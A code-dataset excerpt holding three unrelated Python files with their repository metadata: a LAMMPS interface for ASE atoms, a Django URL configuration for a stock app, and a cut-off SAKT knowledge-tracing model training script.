    seen configuration are updated, keeping the number of ``set``
    commands minimal. Records ``atoms.numbers`` for the next call.
    """
    if self.parameters.atom_types_equal_atomic_numbers:
        current_types = {(i + 1, Z)
                         for i, Z in enumerate(atoms.get_atomic_numbers())}
    else:
        current_types = {(i + 1, self.parameters.atom_types[Z])
                         for i, Z in enumerate(atoms.get_atomic_numbers())}
    try:
        if self.parameters.atom_types_equal_atomic_numbers:
            previous_types = {(i + 1, Z)
                              for i, Z in enumerate(self.previous_atoms_numbers)}
        else:
            previous_types = {(i + 1, self.parameters.atom_types[Z])
                              for i, Z in enumerate(self.previous_atoms_numbers)}
    except (AttributeError, KeyError, TypeError):
        # No usable previous configuration: treat every atom as changed.
        # (Was a bare ``except:`` which also hid real errors.)
        previous_types = set()
    for (i, i_type) in current_types - previous_types:
        cmd = "set atom {} type {}".format(i, i_type)
        self.lmp.command(cmd)
    self.previous_atoms_numbers = atoms.numbers.copy()
def restart_lammps(self, atoms):
    """Tear down any running LAMMPS session and set up a fresh one."""
    if self.started:
        # Wipe all state inside the existing LAMMPS instance.
        self.lmp.command("clear")
    # hope there's no other state to be reset
    self.initialized = False
    self.started = False
    self.previous_atoms_numbers = []
    self.start_lammps()
    self.initialise_lammps(atoms)
def start_lammps(self):
    """Launch (or reuse) the LAMMPS process and run the header commands."""
    # Route the LAMMPS log to the requested file, or discard it entirely.
    log_target = self.parameters.log_file if self.parameters.log_file is not None else 'none'
    cmd_args = ['-echo', 'log', '-log', log_target, '-screen', 'none', '-nocite']
    self.cmd_args = cmd_args
    if not hasattr(self, 'lmp'):
        self.lmp = lammps(self.parameters.lammps_name, self.cmd_args,
                          comm=self.parameters.comm)
    # Use metal units: Angstrom, ps, and eV
    for cmd in self.parameters.lammps_header:
        self.lmp.command(cmd)
    # Remember which unit system the header selected.
    for cmd in self.parameters.lammps_header:
        if "units" in cmd:
            self.units = cmd.split()[1]
    if getattr(self.parameters, "lammps_header_extra", None) is not None:
        for cmd in self.parameters.lammps_header_extra:
            self.lmp.command(cmd)
    self.started = True
def initialise_lammps(self, atoms):
    """Set up a fresh LAMMPS instance to mirror ``atoms``.

    Configures boundaries, the simulation cell, atom types, optional
    molecular topology and the user-supplied commands, then defines the
    thermo variables used later when extracting energies, stresses and
    forces. Sets ``self.initialized`` on success.
    """
    # Initialising commands
    if self.parameters.boundary:
        # if the boundary command is in the supplied commands use that
        # otherwise use atoms pbc
        pbc = atoms.get_pbc()
        for cmd in self.parameters.lmpcmds:
            if 'boundary' in cmd:
                break
        else:
            fix = False
            # TODO: RBW - quick fix so that boundary parallel to surface
            # is not shrink wrapped
            # if "set_wall" in atoms.info.keys():
            #     fix = True
            self.lmp.command('boundary ' + ' '.join([self.lammpsbc(bc, fix)
                                                     for bc in pbc]))
    # Initialize cell
    self.set_cell(atoms, change=not self.parameters.create_box)
    if self.parameters.atom_types is None:
        raise NameError("atom_types are mandatory.")
    if isinstance(self.parameters.atom_types, dict):
        # atom_types is a dictionary with symbols (or numbers) as keys;
        # normalise all keys to atomic numbers.
        self.parameters.atom_types_equal_atomic_numbers = False
        symbol_atom_types = self.parameters.atom_types.copy()
        self.parameters.atom_types = {}
        for sym in symbol_atom_types:
            try:
                num = int(sym)
            except (ValueError, TypeError):
                # key is a chemical symbol rather than a number
                num = symbols2numbers(sym)[0]
            self.parameters.atom_types[num] = symbol_atom_types[sym]
    else:  # not a dict, must be the string TYPE_EQUALS_Z
        if self.parameters.atom_types == "TYPE_EQUALS_Z":
            self.parameters.atom_types_equal_atomic_numbers = True
            self.parameters.atom_types = {}
            for Z in atoms.get_atomic_numbers():
                self.parameters.atom_types[Z] = Z
        else:
            raise ValueError('atom_types parameter "%s" is string, but not TYPE_EQUALS_Z' % self.parameters.atom_types)
    # Atomic numbers of the current configuration, used below for masses.
    numbers = np.asarray(atoms.get_atomic_numbers())
    # Initialize box
    if self.parameters.create_box:
        # count number of known types
        n_types = len(self.parameters.atom_types)
        create_box_command = 'create_box {} cell'.format(n_types)
        # count numbers of bonds and angles defined by potential
        n_dihedral_types = 0
        n_improper_types = 0
        n_angle_types = 0
        n_bond_types = 0
        for cmd in self.parameters.lmpcmds:
            # Raw strings: '\s'/'\d' are invalid escape sequences in plain
            # string literals (DeprecationWarning, SyntaxWarning on 3.12).
            m = re.match(r'\s*angle_coeff\s+(\d+)', cmd)
            if m is not None:
                n_angle_types = max(int(m.group(1)), n_angle_types)
            m = re.match(r'\s*bond_coeff\s+(\d+)', cmd)
            if m is not None:
                n_bond_types = max(int(m.group(1)), n_bond_types)
            m = re.match(r'\s*dihedral_coeff\s+(\d+)', cmd)
            if m is not None:
                n_dihedral_types = max(int(m.group(1)), n_dihedral_types)
            m = re.match(r'\s*improper_coeff\s+(\d+)', cmd)
            if m is not None:
                n_improper_types = max(int(m.group(1)), n_improper_types)
        if self.parameters.read_molecular_info:
            # Reserve per-atom topology storage for whatever the Atoms
            # object carries.
            if 'bonds' in atoms.arrays:
                self.parse_bonds(atoms)
                create_box_command += ' bond/types {} extra/bond/per/atom {}'.format(n_bond_types, atoms.max_n_bonds)
            if 'angles' in atoms.arrays:
                self.parse_angles(atoms)
                create_box_command += ' angle/types {} extra/angle/per/atom {}'.format(n_angle_types, atoms.max_n_angles)
            if 'dihedrals' in atoms.arrays:
                self.parse_dihedrals(atoms)
                create_box_command += ' dihedral/types {} extra/dihedral/per/atom {}'.format(n_dihedral_types, atoms.max_n_dihedrals)
            if 'impropers' in atoms.arrays:
                self.parse_impropers(atoms)
                create_box_command += ' improper/types {} extra/improper/per/atom {}'.format(n_improper_types, atoms.max_n_impropers)
        self.lmp.command(create_box_command)
    # Initialize the atoms with their types
    # positions do not matter here
    if self.parameters.create_atoms:
        self.lmp.command('echo none')  # don't echo the atom positions
        self.rebuild(atoms)
        self.lmp.command('echo log')  # turn back on
    # execute the user commands
    for cmd in self.parameters.lmpcmds:
        self.lmp.command(cmd)
    # Set masses after user commands, to override EAM provided masses, e.g.
    masses = atoms.get_masses()
    for Z in self.parameters.atom_types:
        in_cur_sys = False
        for i in range(len(atoms)):
            if numbers[i] == Z:
                # convert from amu (ASE) to lammps mass unit
                self.lmp.command('mass %d %.30f' % (self.parameters.atom_types[Z],
                                 masses[i] / unit_convert("mass", self.units)))
                in_cur_sys = True
                break
        if not in_cur_sys:
            # species absent from this configuration: use a dummy mass
            self.lmp.command('mass %d %.30f' % (self.parameters.atom_types[Z], 1.0))
    # Define force & energy variables for extraction
    self.lmp.command('variable pxx equal pxx')
    self.lmp.command('variable pyy equal pyy')
    self.lmp.command('variable pzz equal pzz')
    self.lmp.command('variable pxy equal pxy')
    self.lmp.command('variable pxz equal pxz')
    self.lmp.command('variable pyz equal pyz')
    # I am not sure why we need this next line but LAMMPS will
    # raise an error if it is not there. Perhaps it is needed to
    # ensure the cell stresses are calculated
    self.lmp.command('thermo_style custom pe pxx emol ecoul')
    self.lmp.command('variable fx atom fx')
    self.lmp.command('variable fy atom fy')
    self.lmp.command('variable fz atom fz')
    # do we need this if we extract from a global ?
    self.lmp.command('variable pe equal pe')
    self.lmp.command("neigh_modify delay 0 every 1 check yes")
    if self.parameters.read_molecular_info:
        # push topology from the ase-atoms object into LAMMPS when the
        # molecular flag is set
        if 'bonds' in atoms.arrays:
            self.set_bonds(atoms)
        if 'angles' in atoms.arrays:
            self.set_angles(atoms)
        if 'dihedrals' in atoms.arrays:
            self.set_dihedrals(atoms)
        if 'impropers' in atoms.arrays:
            self.set_impropers(atoms)
    if self.parameters.read_molecular_info and 'mmcharge' in atoms.arrays:
        self.set_charges(atoms)
    self.initialized = True
def write_lammps_data(filename, atoms, atom_types, comment=None, cutoff=None,
                      molecule_ids=None, charges=None, units='metal',
                      bond_types=None, angle_types=None, dihedral_types=None,
                      improper_types=None):
    """Write ``atoms`` to a LAMMPS data file (atom_style ``full``).

    Parameters
    ----------
    filename : str or file-like
        Target path, or an already-open handle (left open on return).
    atoms : ase.Atoms
        Configuration to write.
    atom_types : dict
        Mapping atomic number -> 1-based LAMMPS type.
    comment : str, optional
        First line of the data file.
    cutoff : float, optional
        Neighbour cutoff for detecting bonded topology; required when any
        of the ``*_types`` arguments is given.
    molecule_ids, charges : array-like, optional
        Per-atom molecule ids (default all 0) and charges
        (default ``atoms.get_initial_charges()``).
    units : str
        LAMMPS unit system, used for the mass conversion.
    bond_types, angle_types, dihedral_types, improper_types : list, optional
        Lists of atomic-number tuples defining each topology type.
    """
    if isinstance(filename, basestring):
        # NOTE(review): 'basestring' exists only on Python 2; on Python 3
        # this needs 'str' -- confirm which interpreters are supported.
        fh = open(filename, 'w')
    else:
        fh = filename
    if comment is None:
        comment = 'lammpslib autogenerated data file'
    fh.write(comment.strip() + '\n\n')
    fh.write('{0} atoms\n'.format(len(atoms)))
    fh.write('{0} atom types\n'.format(len(atom_types)))
    if bond_types or angle_types or dihedral_types or improper_types:
        # The neighbour list is needed by every topology section below.
        # (Fix: it was previously built only under ``if bond_types:``, so
        # requesting angles/dihedrals/impropers without bonds raised a
        # NameError on i_list/j_list.)
        from matscipy.neighbours import neighbour_list
        i_list, j_list = neighbour_list('ij', atoms, cutoff)
    if bond_types:
        print('Bonds:')
        bonds = []
        for bond_type, (Z1, Z2) in enumerate(bond_types):
            bond_mask = (atoms.numbers[i_list] == Z1) & (atoms.numbers[j_list] == Z2)
            print((Z1, Z2), bond_mask.sum())
            for (I, J) in zip(i_list[bond_mask], j_list[bond_mask]):
                # NB: LAMMPS uses 1-based indices for bond types and particle indices
                bond = (bond_type + 1, I + 1, J + 1)
                bonds.append(bond)
        print('')
        if len(bonds) > 0:
            fh.write('{0} bonds\n'.format(len(bonds)))
            fh.write('{0} bond types\n'.format(len(bond_types)))
    if angle_types:
        print('Angles:')
        angle_count = {angle: 0 for angle in angle_types}
        angles = []
        for I in range(len(atoms)):
            for J in j_list[i_list == I]:
                for K in j_list[i_list == J]:
                    if J < K:
                        # count each J-I-K triplet only once
                        continue
                    Zi, Zj, Zk = atoms.numbers[[I, J, K]]
                    if (Zj, Zi, Zk) in angle_types:
                        angle = (angle_types.index((Zj, Zi, Zk)) + 1,
                                 J + 1, I + 1, K + 1)
                        angle_count[(Zj, Zi, Zk)] += 1
                        angles.append(angle)
        for angle in angle_types:
            print(angle, angle_count[angle])
        print('')
        if len(angles) > 0:
            fh.write('{0} angles\n'.format(len(angles)))
            fh.write('{0} angle types\n'.format(len(angle_types)))
    if dihedral_types:
        print('Dihedrals:')
        dihedral_count = {dihedral: 0 for dihedral in dihedral_types}
        dihedrals = []
        for I in range(len(atoms)):
            for J in j_list[i_list == I]:
                for K in j_list[i_list == J]:
                    for L in j_list[i_list == K]:
                        Zi, Zj, Zk, Zl = atoms.numbers[[I, J, K, L]]
                        if (Zi, Zj, Zk, Zl) in dihedral_types:
                            dihedral = (dihedral_types.index((Zi, Zj, Zk, Zl)) + 1,
                                        I + 1, J + 1, K + 1, L + 1)
                            dihedral_count[(Zi, Zj, Zk, Zl)] += 1
                            dihedrals.append(dihedral)
        for dihedral in dihedral_types:
            print(dihedral, dihedral_count[dihedral])
        print('')
        if len(dihedrals) > 0:
            fh.write('{0} dihedrals\n'.format(len(dihedrals)))
            fh.write('{0} dihedral types\n'.format(len(dihedral_types)))
    if improper_types:
        print('Impropers:')
        improper_count = {improper: 0 for improper in improper_types}
        impropers = []
        for I in range(len(atoms)):
            for J in j_list[i_list == I]:
                for K in j_list[i_list == J]:
                    for L in j_list[i_list == K]:
                        Zi, Zj, Zk, Zl = atoms.numbers[[I, J, K, L]]
                        if (Zi, Zj, Zk, Zl) in improper_types:
                            improper = (improper_types.index((Zi, Zj, Zk, Zl)) + 1,
                                        I + 1, J + 1, K + 1, L + 1)
                            improper_count[(Zi, Zj, Zk, Zl)] += 1
                            impropers.append(improper)
        for improper in improper_types:
            print(improper, improper_count[improper])
        print('')
        if len(impropers) > 0:
            fh.write('{0} impropers\n'.format(len(impropers)))
            fh.write('{0} improper types\n'.format(len(improper_types)))
    fh.write('\n')
    # LAMMPS requires a restricted (upper-triangular) cell.
    cell, coord_transform = convert_cell(atoms.get_cell())
    fh.write('{0:16.8e} {1:16.8e} xlo xhi\n'.format(0.0, cell[0, 0]))
    fh.write('{0:16.8e} {1:16.8e} ylo yhi\n'.format(0.0, cell[1, 1]))
    fh.write('{0:16.8e} {1:16.8e} zlo zhi\n'.format(0.0, cell[2, 2]))
    fh.write('{0:16.8e} {1:16.8e} {2:16.8e} xy xz yz\n'.format(cell[0, 1], cell[0, 2], cell[1, 2]))
    fh.write('\nMasses\n\n')
    # Fix: this dict was initialised as 'sym_mass' but read/written as
    # 'Z_mass', raising NameError at runtime.
    Z_mass = {}
    masses = atoms.get_masses()
    numbers = atoms.get_atomic_numbers()
    for Z in atom_types:
        for i in range(len(atoms)):
            if numbers[i] == Z:
                Z_mass[Z] = masses[i] / unit_convert("mass", units)
                break
        else:
            # species absent from this configuration: use the standard table
            Z_mass[Z] = atomic_masses[Z] / unit_convert("mass", units)
    for (Z, typ) in sorted(atom_types.items(), key=operator.itemgetter(1)):
        fh.write('{0} {1}\n'.format(typ, Z_mass[Z]))
    fh.write('\nAtoms # full\n\n')
    if molecule_ids is None:
        molecule_ids = np.zeros(len(atoms), dtype=int)
    if charges is None:
        charges = atoms.get_initial_charges()
    for i, (Z, mol, q, pos) in enumerate(zip(numbers, molecule_ids,
                                             charges, atoms.get_positions())):
        typ = atom_types[Z]
        fh.write('{0} {1} {2} {3:16.8e} {4:16.8e} {5:16.8e} {6:16.8e}\n'
                 .format(i + 1, mol, typ, q, pos[0], pos[1], pos[2]))
    if bond_types and len(bonds) > 0:
        fh.write('\nBonds\n\n')
        for idx, bond in enumerate(bonds):
            fh.write('{0} {1} {2} {3}\n'
                     .format(*[idx + 1] + list(bond)))
    if angle_types and len(angles) > 0:
        fh.write('\nAngles\n\n')
        for idx, angle in enumerate(angles):
            fh.write('{0} {1} {2} {3} {4}\n'
                     .format(*[idx + 1] + list(angle)))
    if dihedral_types and len(dihedrals) > 0:
        fh.write('\nDihedrals\n\n')
        for idx, dihedral in enumerate(dihedrals):
            fh.write('{0} {1} {2} {3} {4} {5}\n'
                     .format(*[idx + 1] + list(dihedral)))
    if improper_types and len(impropers) > 0:
        fh.write('\nImpropers\n\n')
        for idx, improper in enumerate(impropers):
            fh.write('{0} {1} {2} {3} {4} {5}\n'
                     .format(*[idx + 1] + list(improper)))
    if isinstance(filename, basestring):
        fh.close()
| libAtoms/pymatnest | lammpslib.py | lammpslib.py | py | 38,515 | python | en | code | 26 | github-code | 6 | [
{
"api_name": "numpy.matrix.transpose",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "numpy.matrix",
"line_number": 46,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "numpy.linalg.nor... |
9152769558 | from django.urls import path
from . import views
# URL routes for the stock app. Routes without a ``name=`` kwarg cannot be
# reversed via {% url %}; they are referenced by literal path instead.
urlpatterns = [
# Landing page.
path('',views.Home.as_view(),name='Home'),
# Detail page for a single stock, keyed by its name string.
path(r'stock/<str:Name>',views.Show_Details.as_view()),
# AJAX endpoints polled by the front-end for live data.
path('ajax/get-info',views.get_info),
path('ajax/get-nifty',views.get_nifty),
path('ajax/get-topstocks',views.get_topstocks),
# AJAX endpoint used from the stock detail page.
path('stock/ajax/Get-SelectedStock/',views.Get_SelectedStock),
]
| Pggeeks/Live-StockScrenner-Django | stockapp/urls.py | urls.py | py | 379 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "django.urls.path",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
... |
33350944365 | #%%
import os
import gc
import sys
import pickle
from time import time
import datatable as dt
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import torch
import torch.nn as nn
from torch import optim
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import train_test_split
from torch.autograd import Variable
import torch.optim as optim
from torch.optim import Optimizer
from torch.optim.lr_scheduler import (CosineAnnealingWarmRestarts, CyclicLR, OneCycleLR,
ReduceLROnPlateau)
from torch.utils.data import DataLoader, Dataset
from tqdm import tqdm
# Plotting defaults.
sns.set()
DEFAULT_FIG_WIDTH = 20
sns.set_context("paper", font_scale=1.2)
# WORKSPACE_FOLDER=/home/scao/Documents/kaggle-riiid-test
# PYTHONPATH=${WORKSPACE_FOLDER}:${WORKSPACE_FOLDER}/sakt:${WORKSPACE_FOLDER}/transformer
# Resolve the repo root (parent of the working directory) plus the standard
# model/data folders, and make project modules importable.
HOME = os.path.abspath(os.path.join('.', os.pardir))
print(HOME, '\n\n')
# HOME = "/home/scao/Documents/kaggle-riiid-test/"
MODEL_DIR = os.path.join(HOME, 'model')
DATA_DIR = os.path.join(HOME, 'data')
sys.path.append(HOME)
from utils import *
get_system()
from sakt import *
from iter_env import *
# from transformer_optimizers import *
# %%
'''
TO-DO:
features encoding:
1 how to address the problem with previous answers correctly not uniformly predicted
2 question tags
'''
# Run-mode switches and model hyper-parameters.
DEBUG = True
TRAIN = False
PREPROCESS = False
TEST_SIZE = 0.05
NUM_SKILLS = 13523 # number of problems
MAX_SEQ = 180  # attention window: questions per training sample
ACCEPTED_USER_CONTENT_SIZE = 4  # drop users/windows with fewer interactions
EMBED_SIZE = 128
NUM_HEADS = 8
BATCH_SIZE = 64
VAL_BATCH_SIZE = 2048
DEBUG_TEST_SIZE = 2500  # rows of the simulated test set kept for debugging
DROPOUT = 0.1
SEED = 1127
get_seed(SEED)
'''
Columns placeholder and preprocessing params
'''
CONTENT_TYPE_ID = "content_type_id"
CONTENT_ID = "content_id"
TARGET = "answered_correctly"
USER_ID = "user_id"
PRIOR_QUESTION_TIME = 'prior_question_elapsed_time'
PRIOR_QUESTION_EXPLAIN = 'prior_question_had_explanation'
TASK_CONTAINER_ID = "task_container_id"
TIMESTAMP = "timestamp"
ROW_ID = 'row_id'
FILLNA_VAL = 14_000 # for prior question elapsed time, rounded average in train
TIME_SCALING = 1000 # scaling down the prior question elapsed time
TRAIN_COLS = [TIMESTAMP, USER_ID, CONTENT_ID, CONTENT_TYPE_ID, TARGET]
TRAIN_COLS_NEW = [TIMESTAMP, USER_ID, CONTENT_ID, CONTENT_TYPE_ID,
                  TARGET, PRIOR_QUESTION_TIME, PRIOR_QUESTION_EXPLAIN]
# Compact dtypes keep the 50M+ row training frame in memory.
TRAIN_DTYPES = {TIMESTAMP: 'int64',
                USER_ID: 'int32',
                CONTENT_ID: 'int16',
                CONTENT_TYPE_ID: 'bool',
                TARGET:'int8',
                PRIOR_QUESTION_TIME: np.float32,
                PRIOR_QUESTION_EXPLAIN: 'boolean'}
# Row budgets, reduced in DEBUG mode for fast iteration.
if DEBUG:
    NROWS_TEST = 25_000
    NROWS_TRAIN = 5_000_000
    NROWS_VAL = 500_000
else:
    NROWS_TEST = 250_000
    NROWS_TRAIN = 50_000_000
    NROWS_VAL = 2_000_000
# %%
# Either rebuild the per-user interaction groups from the raw parquet
# splits, or load the cached pickle and carve out a validation share.
if PREPROCESS:
    with timer("Loading train from parquet"):
        train_df = pd.read_parquet(os.path.join(DATA_DIR, 'cv2_train.parquet'),
                                   columns=list(TRAIN_DTYPES.keys())).astype(TRAIN_DTYPES)
        valid_df = pd.read_parquet(os.path.join(DATA_DIR, 'cv2_valid.parquet'),
                                   columns=list(TRAIN_DTYPES.keys())).astype(TRAIN_DTYPES)
    if DEBUG:
        train_df = train_df[:NROWS_TRAIN]
        valid_df = valid_df[:NROWS_VAL]
    with timer("Processing train"):
        train_group = preprocess(train_df)
        valid_group = preprocess(valid_df, train_flag=2)
else:
    with open(os.path.join(DATA_DIR, 'sakt_group_cv2.pickle'), 'rb') as f:
        group = pickle.load(f)
    train_group, valid_group = train_test_split(group, test_size = TEST_SIZE, random_state=SEED)
print(f"valid users: {len(valid_group.keys())}")
print(f"train users: {len(train_group.keys())}")
# %%
class SAKTDataset(Dataset):
    """Training dataset for SAKT: one sample per (user, window) pair.

    Histories longer than ``max_seq`` are chopped into consecutive
    windows; users (or leftover tails) with fewer than
    ``ACCEPTED_USER_CONTENT_SIZE`` interactions are dropped.
    """

    def __init__(self, group, n_skill, max_seq=MAX_SEQ):
        super(SAKTDataset, self).__init__()
        self.samples = {}
        self.n_skill = n_skill
        self.max_seq = max_seq
        self.user_ids = []
        for user_id in group.index:
            content_id, answered_correctly = group[user_id]
            n_inter = len(content_id)
            if n_inter < ACCEPTED_USER_CONTENT_SIZE:
                continue
            if n_inter > self.max_seq:
                # Split a long history into full windows of max_seq.
                n_full = n_inter // self.max_seq
                for seq in range(n_full):
                    key = f"{user_id}_{seq}"
                    lo = seq * self.max_seq
                    hi = lo + self.max_seq
                    self.user_ids.append(key)
                    self.samples[key] = (content_id[lo:hi],
                                         answered_correctly[lo:hi])
                # Keep the trailing partial window if it is long enough.
                tail = n_full * self.max_seq
                if len(content_id[tail:]) >= ACCEPTED_USER_CONTENT_SIZE:
                    key = f"{user_id}_{n_full + 1}"
                    self.user_ids.append(key)
                    self.samples[key] = (content_id[tail:],
                                         answered_correctly[tail:])
            else:
                key = f'{user_id}'
                self.user_ids.append(key)
                self.samples[key] = (content_id, answered_correctly)

    def __len__(self):
        return len(self.user_ids)

    def __getitem__(self, index):
        key = self.user_ids[index]
        content_id, answered_correctly = self.samples[key]
        seq_len = len(content_id)
        q_seq = np.zeros(self.max_seq, dtype=int)
        a_seq = np.zeros(self.max_seq, dtype=int)
        if seq_len >= self.max_seq:
            q_seq[:] = content_id[-self.max_seq:]
            a_seq[:] = answered_correctly[-self.max_seq:]
        else:
            # Left-pad short sequences with zeros.
            q_seq[-seq_len:] = content_id
            a_seq[-seq_len:] = answered_correctly
        target_id = q_seq[1:]   # questions up to the current one
        label = a_seq[1:]       # their correctness labels
        x = q_seq[:-1].copy()   # questions up to the previous one
        # Encode the previous answers: shift by n_skill when correct.
        x += (a_seq[:-1] == 1) * self.n_skill
        return x, target_id, label
# %%
# Build the training/validation loaders over the per-user groups.
train_dataset = SAKTDataset(train_group, n_skill=NUM_SKILLS, max_seq=MAX_SEQ)
train_dataloader = DataLoader(train_dataset,
                              batch_size=BATCH_SIZE,
                              shuffle=True,
                              drop_last=True)
val_dataset = SAKTDataset(valid_group, n_skill=NUM_SKILLS, max_seq=MAX_SEQ)
val_dataloader = DataLoader(val_dataset,
                            batch_size=VAL_BATCH_SIZE,
                            shuffle=False)
print(f"Length of the train loader is {len(train_dataloader)}")
#%%
# Peek at one batch: (x, target_id, label), each of shape (batch, MAX_SEQ-1).
sample_batch = next(iter(train_dataloader))
sample_batch[0].shape, sample_batch[1].shape, sample_batch[2].shape
# %%
'''
Debugging
'''
# Re-derive a single sample by hand (mirrors SAKTDataset.__getitem__)
# to check the encoding against sample_batch above.
content_id, answered_correctly = train_group[train_group.keys()[0]]
seq_len = len(content_id)
content_id_seq = np.zeros(MAX_SEQ, dtype=int)
answered_correctly_seq = np.zeros(MAX_SEQ, dtype=int)
if seq_len >= MAX_SEQ:
    content_id_seq[:] = content_id[-MAX_SEQ:]
    answered_correctly_seq[:] = answered_correctly[-MAX_SEQ:]
else:
    content_id_seq[-seq_len:] = content_id
    answered_correctly_seq[-seq_len:] = answered_correctly
# question till the current one, should be the same with sample_batch[1][0]
target_id = content_id_seq[1:]
# whether answered correctly, same with sample_batch[2][0]
label = answered_correctly_seq[1:] #
x = content_id_seq[:-1].copy() # question till the previous one
# encoded answers till the previous question
# if a user answered correctly it is added 13523
x += (answered_correctly_seq[:-1] == 1) * NUM_SKILLS
# %% Merging questions
# questions_df = pd.read_csv(os.path.join(DATA_DIR, 'questions.csv'))
# questions_df['part'] = questions_df['part'].astype(np.int32)
# questions_df['bundle_id'] = questions_df['bundle_id'].astype(np.int32)
# train_debug = pd.merge(train_df, questions_df[['question_id', 'part']],
# left_on = 'content_id', right_on = 'question_id', how = 'left')
# %% model
class FFN(nn.Module):
    """Position-wise feed-forward block:
    Linear -> ReLU -> BatchNorm1d -> Linear -> Dropout."""

    def __init__(self, state_size=MAX_SEQ,
                 forward_expansion=1,
                 bn_size=MAX_SEQ - 1,
                 dropout=0.2):
        super(FFN, self).__init__()
        self.state_size = state_size
        hidden = forward_expansion * state_size
        # Attribute names are kept stable so saved state dicts still load.
        self.lr1 = nn.Linear(state_size, hidden)
        self.relu = nn.ReLU()
        self.bn = nn.BatchNorm1d(bn_size)
        self.lr2 = nn.Linear(hidden, state_size)
        self.dropout = nn.Dropout(dropout)

    def forward(self, x):
        out = self.lr1(x)
        out = self.relu(out)
        out = self.bn(out)
        out = self.lr2(out)
        return self.dropout(out)
def future_mask(seq_length):
    """Boolean upper-triangular mask that blocks attention to future positions."""
    mask = np.triu(np.ones((seq_length, seq_length)), k=1).astype('bool')
    return torch.from_numpy(mask)
class TransformerBlock(nn.Module):
    # One SAKT encoder block: masked multi-head self-attention followed by a
    # position-wise FFN, each wrapped with residual + LayerNorm + Dropout.
    def __init__(self, embed_dim,
                 heads = 8,
                 dropout = DROPOUT,
                 forward_expansion = 1):
        super(TransformerBlock, self).__init__()
        self.multi_att = nn.MultiheadAttention(embed_dim=embed_dim,
                                               num_heads=heads, dropout=dropout)
        self.dropout = nn.Dropout(dropout)
        self.layer_normal = nn.LayerNorm(embed_dim)
        self.ffn = FFN(embed_dim,
                       forward_expansion = forward_expansion,
                       dropout=dropout)
        self.layer_normal_2 = nn.LayerNorm(embed_dim)
    def forward(self, value, key, query, att_mask):
        # NOTE(review): nn.MultiheadAttention's positional signature is
        # (query, key, value); the local names here do not match the roles
        # torch assigns them -- the first argument ('value') acts as the
        # query. The caller passes (e, x, x); verify the ordering is intended.
        att_output, att_weight = self.multi_att(value, key, query, attn_mask=att_mask)
        # Residual connection uses the first argument (the exercise embedding).
        att_output = self.dropout(self.layer_normal(att_output + value))
        att_output = att_output.permute(1, 0, 2)
        # att_output: [s_len, bs, embed] => [bs, s_len, embed]
        x = self.ffn(att_output)
        x = self.dropout(self.layer_normal_2(x + att_output))
        # Returns batch-first activations plus the attention weights.
        return x.squeeze(-1), att_weight
class Encoder(nn.Module):
    # SAKT encoder: embeds past interactions and current question ids, then
    # applies a stack of causally-masked TransformerBlocks.
    def __init__(self, n_skill, max_seq=100,
                 embed_dim=128,
                 dropout = DROPOUT,
                 forward_expansion = 1,
                 num_layers=1,
                 heads = 8):
        super(Encoder, self).__init__()
        self.n_skill, self.embed_dim = n_skill, embed_dim
        # Interaction embedding: ids in [0, 2*n_skill] encode
        # (question id, previous-answer correctness) jointly.
        self.embedding = nn.Embedding(2 * n_skill + 1, embed_dim)
        # Learned positional embedding over the max_seq-1 model positions.
        self.pos_embedding = nn.Embedding(max_seq - 1, embed_dim)
        # Embedding of the target (current) question ids.
        self.e_embedding = nn.Embedding(n_skill+1, embed_dim)
        self.layers = nn.ModuleList([TransformerBlock(embed_dim, heads=heads,
                                     forward_expansion = forward_expansion) for _ in range(num_layers)])
        self.dropout = nn.Dropout(dropout)
    def forward(self, x, question_ids):
        device = x.device
        x = self.embedding(x)
        pos_id = torch.arange(x.size(1)).unsqueeze(0).to(device)
        pos_x = self.pos_embedding(pos_id)
        x = self.dropout(x + pos_x)
        x = x.permute(1, 0, 2) # x: [bs, s_len, embed] => [s_len, bs, embed]
        e = self.e_embedding(question_ids)
        e = e.permute(1, 0, 2)
        for layer in self.layers:
            # Causal mask so position t only attends to positions <= t.
            att_mask = future_mask(e.size(0)).to(device)
            x, att_weight = layer(e, x, x, att_mask=att_mask)
            # Each block returns batch-first; flip back to seq-first for the
            # next block.
            x = x.permute(1, 0, 2)
        # Final flip back to batch-first for the prediction head.
        x = x.permute(1, 0, 2)
        return x, att_weight
class SAKTModel(nn.Module):
    """Full SAKT network: transformer encoder plus a per-position linear
    head producing one correctness logit per question."""

    def __init__(self,
                 n_skill,
                 max_seq=MAX_SEQ,
                 embed_dim=EMBED_SIZE,
                 dropout=DROPOUT,
                 forward_expansion=1,
                 enc_layers=1,
                 heads=NUM_HEADS):
        super(SAKTModel, self).__init__()
        # Attribute names ('encoder', 'pred') are kept stable so saved
        # state dicts still load.
        self.encoder = Encoder(n_skill,
                               max_seq,
                               embed_dim,
                               dropout,
                               forward_expansion,
                               num_layers=enc_layers,
                               heads=heads)
        self.pred = nn.Linear(embed_dim, 1)

    def forward(self, x, question_ids):
        encoded, att_weight = self.encoder(x, question_ids)
        logits = self.pred(encoded)
        return logits.squeeze(-1), att_weight
class TestDataset(Dataset):
    # Inference-time dataset: one item per row of test_df; the user's stored
    # history in ``samples`` supplies the past-interaction sequence.
    def __init__(self, samples, test_df, n_skill, max_seq=100):
        # NOTE(review): default max_seq=100 differs from the training
        # MAX_SEQ=180; callers in this file pass max_seq=MAX_SEQ explicitly.
        super(TestDataset, self).__init__()
        # samples: user_id -> (content_id array, answered_correctly array);
        # must expose .index (e.g. a pandas Series).
        self.samples = samples
        self.user_ids = [x for x in test_df["user_id"].unique()]
        self.test_df = test_df
        self.n_skill, self.max_seq = n_skill, max_seq
    def __len__(self):
        return self.test_df.shape[0]
    def __getitem__(self, index):
        test_info = self.test_df.iloc[index]
        user_id = test_info['user_id']
        target_id = test_info['content_id']  # question to predict
        content_id_seq = np.zeros(self.max_seq, dtype=int)
        answered_correctly_seq = np.zeros(self.max_seq, dtype=int)
        if user_id in self.samples.index:
            content_id, answered_correctly = self.samples[user_id]
            seq_len = len(content_id)
            if seq_len >= self.max_seq:
                content_id_seq = content_id[-self.max_seq:]
                answered_correctly_seq = answered_correctly[-self.max_seq:]
            else:
